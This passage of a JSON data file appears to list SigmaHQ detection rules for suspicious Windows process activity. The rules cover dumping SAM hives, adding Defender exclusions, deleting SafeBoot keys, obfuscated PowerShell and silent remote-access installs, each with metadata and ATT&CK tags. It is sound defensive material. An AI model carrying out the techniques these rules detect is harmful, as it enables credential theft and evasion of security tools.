"estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a4e3d776-f12e-42c2-8510-9e6ed1f43ec3", "value": "Unusual Child Process of dns.exe" }, { "description": "Detects execution of \"reg.exe\" commands with the \"delete\" flag on safe boot registry keys. Often used by attacker to prevent safeboot execution of security products", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), Tim Shelton", "creation_date": "2022-08-08", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_reg_delete_safeboot.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.trendmicro.com/en_us/research/22/e/avoslocker-ransomware-variant-abuses-driver-file-to-disable-anti-Virus-scans-log4shell.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_delete_safeboot.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "fc0e89b5-adb0-43c1-b749-c12a10ec37de", "value": "SafeBoot Registry Key Deleted Via Reg.EXE" }, { "description": "Detects PowerShell execution to set the ACL of a file or a folder", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-10-18", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_powershell_set_acl.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-acl?view=powershell-5.1", "https://github.com/redcanaryco/atomic-red-team/blob/74438b0237d141ee9c99747976447dc884cb1a39/atomics/T1505.005/T1505.005.md", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_set_acl.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "bdeb2cff-af74-4094-8426-724dc937f20a", "value": "PowerShell Script Change Permission Via Set-Acl" }, { "description": "Detects the use of NirCmd tool for command execution as SYSTEM user", "meta": { "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-01-24", "falsepositive": [ "Legitimate use by administrators" ], "filename": "proc_creation_win_pua_nircmd_as_system.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.nirsoft.net/utils/nircmd2.html#using", "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", "https://www.nirsoft.net/utils/nircmd.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_nircmd_as_system.yml" ], "tags": [ "attack.execution", "attack.t1569.002", "attack.s0029" ] }, "related": [ { "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d9047477-0359-48c9-b8c7-792cedcdc9c4", "value": "PUA - NirCmd Execution As LOCAL SYSTEM" }, { "description": "Detects using WorkFolders.exe to execute an arbitrary control.exe", "meta": { "author": "Maxime Thiebaut (@0xThiebaut)", "creation_date": "2021-10-21", "falsepositive": [ "Legitimate usage of the uncommon Windows Work Folders feature." 
], "filename": "proc_creation_win_susp_workfolders.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/elliotkillick/status/1449812843772227588", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_workfolders.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0bbc6369-43e3-453d-9944-cae58821c173", "value": "Execution via WorkFolders.exe" }, { "description": "Detects commandline arguments for executing a child process via dotnet-trace.exe", "meta": { "author": "Jimmy Bayne (@bohops)", "creation_date": "2024-01-02", "falsepositive": [ "Legitimate usage of the utility in order to debug and trace a program." ], "filename": "proc_creation_win_dotnet_trace_lolbin_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/bohops/status/1740022869198037480", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dotnet_trace_lolbin_execution.yml" ], "tags": [ "attack.execution", "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9257c05b-4a4a-48e5-a670-b7b073cf401b", "value": "Binary Proxy Execution Via Dotnet-Trace.EXE" }, { "description": "Detects execution of GfxDownloadWrapper.exe with a URL as an argument to download file.", "meta": { "author": "Victor Sergeev, oscd.community", "creation_date": "2020-10-09", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_gfxdownloadwrapper_arbitrary_file_download.yml", "level": "medium", "logsource.category": 
"process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/HonorableMentions/GfxDownloadWrapper/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_gfxdownloadwrapper_arbitrary_file_download.yml" ], "tags": [ "attack.command-and-control", "attack.t1105" ] }, "related": [ { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "eee00933-a761-4cd0-be70-c42fe91731e7", "value": "Arbitrary File Download Via GfxDownloadWrapper.EXE" }, { "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data.", "meta": { "author": "frack113", "creation_date": "2021-07-30", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_susp_recon.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1119/T1119.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_recon.yml" ], "tags": [ "attack.collection", "attack.t1119" ] }, "related": [ { "dest-uuid": "30208d3e-0d6b-43c8-883e-44462a514619", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "aa2efee7-34dd-446e-8a37-40790a66efd7", "value": "Recon Information for Export with Command Prompt" }, { "description": "Detects potential RDP connection via Mstsc using a local \".rdp\" file located in suspicious locations.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-04-18", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_mstsc_run_local_rpd_file_susp_parent.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", 
"refs": [ "https://web.archive.org/web/20230726144748/https://blog.thickmints.dev/mintsights/detecting-rogue-rdp/", "https://www.blackhillsinfosec.com/rogue-rdp-revisiting-initial-access-methods/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mstsc_run_local_rpd_file_susp_parent.yml" ], "tags": [ "attack.lateral-movement" ] }, "uuid": "ff3b6b39-e765-42f9-bb2c-ea6761e0e0f6", "value": "Mstsc.EXE Execution From Uncommon Parent" }, { "description": "The Windows Test Authoring and Execution Framework (TAEF) allows you to run automation by executing test files written in different languages (C, C#, Microsoft COM Scripting interfaces).\nAdversaries may execute malicious code (such as a WSC file with VBScript, a DLL and so on) directly by running te.exe\n", "meta": { "author": "Agro (@agro_sev) oscd.community", "creation_date": "2020-10-13", "falsepositive": [ "It's not uncommon to use te.exe directly to execute legitimate TAEF tests" ], "filename": "proc_creation_win_susp_use_of_te_bin.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows-hardware/drivers/taef/", "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Te/", "https://twitter.com/pabraeken/status/993298228840992768", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_use_of_te_bin.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "634b00d5-ccc3-4a06-ae3b-0ec8444dd51b", "value": "Malicious Windows Script Components File Execution by TAEF Detection" }, { "description": "Detects the enabling of the Windows Recall feature via registry manipulation.\nWindows Recall can be enabled by deleting the existing \"DisableAIDataAnalysis\" 
value, or setting it to 0.\nAdversaries may enable Windows Recall as part of post-exploitation discovery and collection activities.\nThis rule assumes that Recall is already explicitly disabled on the host, and subsequently enabled by the adversary.\n", "meta": { "author": "Sajid Nawaz Khan", "creation_date": "2024-06-02", "falsepositive": [ "Legitimate use/activation of Windows Recall" ], "filename": "proc_creation_win_reg_enable_windows_recall.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows/client-management/mdm/policy-csp-windowsai#disableaidataanalysis", "https://learn.microsoft.com/en-us/windows/client-management/manage-recall", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_enable_windows_recall.yml" ], "tags": [ "attack.collection", "attack.t1113" ] }, "related": [ { "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "817f252c-5143-4dae-b418-48c3e9f63728", "value": "Windows Recall Feature Enabled Via Reg.EXE" }, { "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", "meta": { "author": "Timur Zinniatullin, oscd.community", "creation_date": "2020-10-13", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_hktl_invoke_obfuscation_via_var.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/SigmaHQ/sigma/issues/1009", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_var.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027", "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": 
"related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e9f55347-2928-4c06-88e5-1a7f8169942e", "value": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION" }, { "description": "Detects AnyDesk Remote Desktop silent installation. Which can be used by attackers to gain remote access.", "meta": { "author": "Ján Trenčanský", "creation_date": "2021-08-06", "falsepositive": [ "Legitimate deployment of AnyDesk" ], "filename": "proc_creation_win_remote_access_tools_anydesk_silent_install.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://support.anydesk.com/Automatic_Deployment", "https://twitter.com/TheDFIRReport/status/1423361119926816776?s=20", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_access_tools_anydesk_silent_install.yml" ], "tags": [ "attack.command-and-control", "attack.t1219" ] }, "related": [ { "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "114e7f1c-f137-48c8-8f54-3088c24ce4b9", "value": "Remote Access Tool - AnyDesk Silent Installation" }, { "description": "Detects execution of rundll32 where the DLL being called is stored in an Alternate Data Stream (ADS).", "meta": { "author": "Harjot Singh, '@cyb3rjy0t'", "creation_date": "2023-01-21", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_rundll32_ads_stored_dll_execution.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/Rundll32", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_ads_stored_dll_execution.yml" ], "tags": [ "attack.defense-evasion", "attack.t1564.004" ] }, "related": 
[ { "dest-uuid": "f2857333-11d4-45bf-b064-2c28d8525be5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9248c7e1-2bf3-4661-a22c-600a8040b446", "value": "Potential Rundll32 Execution With DLL Stored In ADS" }, { "description": "Detects execution of LiveKD with the \"-m\" flag to potentially dump the kernel memory", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-05-16", "falsepositive": [ "Unlikely in production environment" ], "filename": "proc_creation_win_sysinternals_livekd_kernel_memory_dump.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://kb.acronis.com/content/60892", "https://learn.microsoft.com/en-us/sysinternals/downloads/livekd", "https://4sysops.com/archives/creating-a-complete-memory-dump-without-a-blue-screen/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_livekd_kernel_memory_dump.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "c7746f1c-47d3-43d6-8c45-cd1e54b6b0a2", "value": "Kernel Memory Dump Via LiveKD" }, { "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", "meta": { "author": "Nikita Nazarov, oscd.community", "creation_date": "2020-10-08", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_hktl_invoke_obfuscation_via_use_mhsta.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/SigmaHQ/sigma/issues/1009", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_use_mhsta.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027", "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" 
}, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ac20ae82-8758-4f38-958e-b44a3140ca88", "value": "Invoke-Obfuscation Via Use MSHTA" }, { "description": "Detects the usage of \"reg.exe\" to add Defender folder exclusions. Qbot has been seen using this technique to add exclusions for folders within AppData and ProgramData.", "meta": { "author": "frack113", "creation_date": "2022-02-13", "falsepositive": [ "Legitimate use" ], "filename": "proc_creation_win_reg_defender_exclusion.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/", "https://redcanary.com/threat-detection-report/threats/qbot/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_defender_exclusion.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "48917adc-a28e-4f5d-b729-11e75da8941f", "value": "Suspicious Windows Defender Folder Exclusion Added Via Reg.EXE" }, { "description": "Detects uncommon child processes of \"DefaultPack.EXE\" binary as a proxy to launch other programs", "meta": { "author": "frack113", "creation_date": "2022-12-31", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_defaultpack_uncommon_child_process.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.echotrail.io/insights/search/defaultpack.exe", "https://lolbas-project.github.io/lolbas/OtherMSBinaries/DefaultPack/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_defaultpack_uncommon_child_process.yml" ], "tags": [ 
"attack.t1218", "attack.defense-evasion", "attack.execution" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b2309017-4235-44fe-b5af-b15363011957", "value": "Uncommon Child Process Of Defaultpack.EXE" }, { "description": "Detects execution of \"odbcconf\" with the \"REGSVR\" action where the DLL in question doesn't contain a \".dll\" extension. Which is often used as a method to evade defenses.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-05-22", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_odbcconf_register_dll_regsvr_susp.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.trendmicro.com/en_us/research/17/h/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses.html", "https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/", "https://learn.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-ver16", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_odbcconf_register_dll_regsvr_susp.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218.008" ] }, "related": [ { "dest-uuid": "6e3bd510-6b33-41a4-af80-2d80f3ee0071", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ba4cfc11-d0fa-4d94-bf20-7c332c412e76", "value": "Potentially Suspicious DLL Registered Via Odbcconf.EXE" }, { "description": "Detects the execution of format.com with an uncommon filesystem selection that could indicate a defense evasion activity in which \"format.com\" is used to load malicious DLL files or other programs.\n", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-01-04", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_format_uncommon_filesystem_load.yml", 
"level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/0gtweet/status/1477925112561209344", "https://twitter.com/wdormann/status/1478011052130459653?s=20", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_format_uncommon_filesystem_load.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "9fb6b26e-7f9e-4517-a48b-8cac4a1b6c60", "value": "Uncommon FileSystem Load Attempt By Format.com" }, { "description": "Detects MsiExec loading a DLL and calling its DllUnregisterServer function", "meta": { "author": "frack113", "creation_date": "2022-04-24", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_msiexec_dll.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/Msiexec/", "https://twitter.com/_st0pp3r_/status/1583914515996897281", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msiexec_dll.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218.007" ] }, "related": [ { "dest-uuid": "365be77f-fc0e-42ee-bac8-4faf806d9336", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "84f52741-8834-4a8c-a413-2eb2269aa6c8", "value": "DllUnregisterServer Function Call Via Msiexec.EXE" }, { "description": "Detects usage of the \"dir\" command part of Windows CMD with the \"/S\" command line flag in order to enumerate files in a specified directory and all subdirectories.\n", "meta": { "author": "frack113", "creation_date": "2021-12-13", "falsepositive": [ "Likely" ], "filename": "proc_creation_win_cmd_dir_execution.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ 
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1217/T1217.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_dir_execution.yml" ], "tags": [ "attack.discovery", "attack.t1217" ] }, "related": [ { "dest-uuid": "5e4a2073-9643-44cb-a0b5-e7f4048446c7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7c9340a9-e2ee-4e43-94c5-c54ebbea1006", "value": "File And SubFolder Enumeration Via Dir Command" }, { "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. 
(Citation: Symantec Living off the Land)\n", "meta": { "author": "frack113", "creation_date": "2022-09-25", "falsepositive": [ "Legitimate use" ], "filename": "proc_creation_win_remote_access_tools_netsupport.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_access_tools_netsupport.yml" ], "tags": [ "attack.command-and-control", "attack.t1219" ] }, "related": [ { "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "758ff488-18d5-4cbe-8ec4-02b6285a434f", "value": "Remote Access Tool - NetSupport Execution" }, { "description": "Detects the execution of WMIC with the \"format\" flag to potentially load XSL files.\nAdversaries abuse this functionality to execute arbitrary files while potentially bypassing application whitelisting defenses.\nExtensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files.\n", "meta": { "author": "Timur Zinniatullin, oscd.community, Swachchhanda Shrawan Poudel", "creation_date": "2019-10-21", "falsepositive": [ "WMIC.exe FP depend on scripts and administrative methods used in the monitored environment.", "Static format arguments - https://petri.com/command-line-wmi-part-3" ], "filename": "proc_creation_win_wmic_xsl_script_processing.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1220/T1220.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_xsl_script_processing.yml" ], "tags": 
[ "attack.defense-evasion", "attack.t1220" ] }, "related": [ { "dest-uuid": "ebbe170d-aa74-4946-8511-9921243415a3", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "05c36dd6-79d6-4a9a-97da-3db20298ab2d", "value": "XSL Script Execution Via WMIC.EXE" }, { "description": "Detects execution of \"msdt.exe\" using an answer file which is simulating the legitimate way of calling msdt via \"pcwrun.exe\" (For example from the compatibility tab)", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-06-13", "falsepositive": [ "Possible undocumented parents of \"msdt\" other than \"pcwrun\"" ], "filename": "proc_creation_win_lolbin_msdt_answer_file.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/Msdt/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_msdt_answer_file.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218", "attack.execution" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9c8c7000-3065-44a8-a555-79bcba5d9955", "value": "Execute MSDT Via Answer File" }, { "description": "Detects scheduled task creations or modification to be run with high privileges on a suspicious schedule type", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-31", "falsepositive": [ "Some installers were seen using this method of creation unfortunately. 
Filter them in your environment" ], "filename": "proc_creation_win_schtasks_schedule_type_system.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-change", "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-create", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_schedule_type_system.yml" ], "tags": [ "attack.execution", "attack.t1053.005" ] }, "related": [ { "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7a02e22e-b885-4404-b38b-1ddc7e65258a", "value": "Suspicious Schtasks Schedule Type With High Privileges" }, { "description": "Detects the execution of \"wmic\" with the \"process\" flag, which adversary might use to list processes running on the compromised host or list installed software hotfixes and patches.", "meta": { "author": "frack113", "creation_date": "2022-01-01", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_wmic_recon_process.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wmic", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_recon_process.yml" ], "tags": [ "attack.execution", "attack.t1047" ] }, "related": [ { "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "221b251a-357a-49a9-920a-271802777cc0", "value": "Process Reconnaissance Via Wmic.EXE" }, { 
"description": "Detects the usage of \"reg.exe\" in order to dump sensitive registry hives. This includes SAM, SYSTEM and SECURITY hives.", "meta": { "author": "Teymur Kheirkhabarov, Endgame, JHasenbusch, Daniil Yugoslavskiy, oscd.community, frack113", "creation_date": "2019-10-22", "falsepositive": [ "Dumping hives for legitimate purpose i.e. backup or forensic investigation" ], "filename": "proc_creation_win_reg_dumping_sensitive_hives.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.wietzebeukema.nl/blog/windows-command-line-obfuscation", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-1---registry-dump-of-sam-creds-and-secrets", "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003/T1003.md", "https://eqllib.readthedocs.io/en/latest/analytics/aed95fc6-5e3f-49dc-8b35-06508613f979.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_dumping_sensitive_hives.yml" ], "tags": [ "attack.credential-access", "attack.t1003.002", "attack.t1003.004", "attack.t1003.005", "car.2013-07-001" ] }, "related": [ { "dest-uuid": "1644e709-12d2-41e5-a60f-3470991f5011", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "1ecfdab8-7d59-4c98-95d4-dc41970f57fc", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "6add2ab5-2711-4e9d-87c8-7a0be8531530", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "fd877b94-9bb5-4191-bb25-d79cbd93c167", "value": "Dumping of Sensitive Hives Via Reg.EXE" }, { "description": "Detects a suspicious execution 
of a Microsoft HTML Help (HH.exe)", "meta": { "author": "Maxim Pavlunin", "creation_date": "2020-04-01", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_hh_susp_execution.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.zscaler.com/blogs/security-research/unintentional-leak-glimpse-attack-vectors-apt37", "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/chm-badness-delivers-a-banking-trojan/", "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/", "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-27939090904026cc396b0b629c8e4314acd6f5dac40a676edbc87f4567b47eb7", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hh_susp_execution.yml" ], "tags": [ "attack.defense-evasion", "attack.execution", "attack.initial-access", "attack.t1047", "attack.t1059.001", "attack.t1059.003", "attack.t1059.005", "attack.t1059.007", "attack.t1218", "attack.t1218.001", "attack.t1218.010", "attack.t1218.011", "attack.t1566", "attack.t1566.001" ] }, "related": [ { "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "dfd7cc1d-e1d8-4394-a198-97c4cab8aa67", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { 
